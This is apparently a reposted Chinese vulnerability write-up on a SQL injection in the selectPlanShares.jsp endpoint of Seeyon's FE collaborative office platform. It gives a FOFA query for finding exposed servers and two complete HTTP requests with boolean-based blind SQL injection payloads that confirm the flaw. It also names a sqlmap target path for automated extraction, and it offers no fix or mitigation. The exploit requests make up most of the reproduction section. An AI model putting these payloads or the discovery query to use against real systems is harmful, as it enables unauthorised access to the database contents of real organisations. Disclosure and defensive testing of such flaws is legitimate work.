登录 白背景

致远互联FE协作办公平台selectPlanShares存在SQL注入漏洞

一、漏洞简介

北京致远互联软件股份有限公司致远互联FE协作办公平台selectPlanShares存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

  • 致远互联-FE协作办公平台

三、资产测绘

  • fofaapp="致远互联-FE"
  • 特征

1698659959745-2fa812d0-dff6-4e46-9a5a-d5060f83756a.png

四、漏洞复现

GET /common/selectPlanShares.jsp?id=%28SELECT+%28CASE+WHEN+%285844%3D5843%29+THEN+1+ELSE+%28SELECT+5085+UNION+SELECT+4655%29+END%29%29 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=F4350FBCDD24A8F9F8BBE1B1F9F87362
Upgrade-Insecure-Requests: 1

1715918240857-a2ca527e-044f-4338-b717-abcd221f723b.png

GET /common/selectPlanShares.jsp?id=%28SELECT+%28CASE+WHEN+%285844%3D5844%29+THEN+1+ELSE+%28SELECT+5085+UNION+SELECT+4655%29+END%29%29 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=F4350FBCDD24A8F9F8BBE1B1F9F87362
Upgrade-Insecure-Requests: 1

1715918260208-ef7a26ee-8a5f-416c-b8bb-f618fd52f472.png

sqlmap

/common/selectPlanShares.jsp?id=

1715918273166-ad6a6f8a-fe91-4368-8f96-b991f3ec665c.png

原文: https://www.yuque.com/xiaokp7/ocvun2/gblx0xzoibyfxvag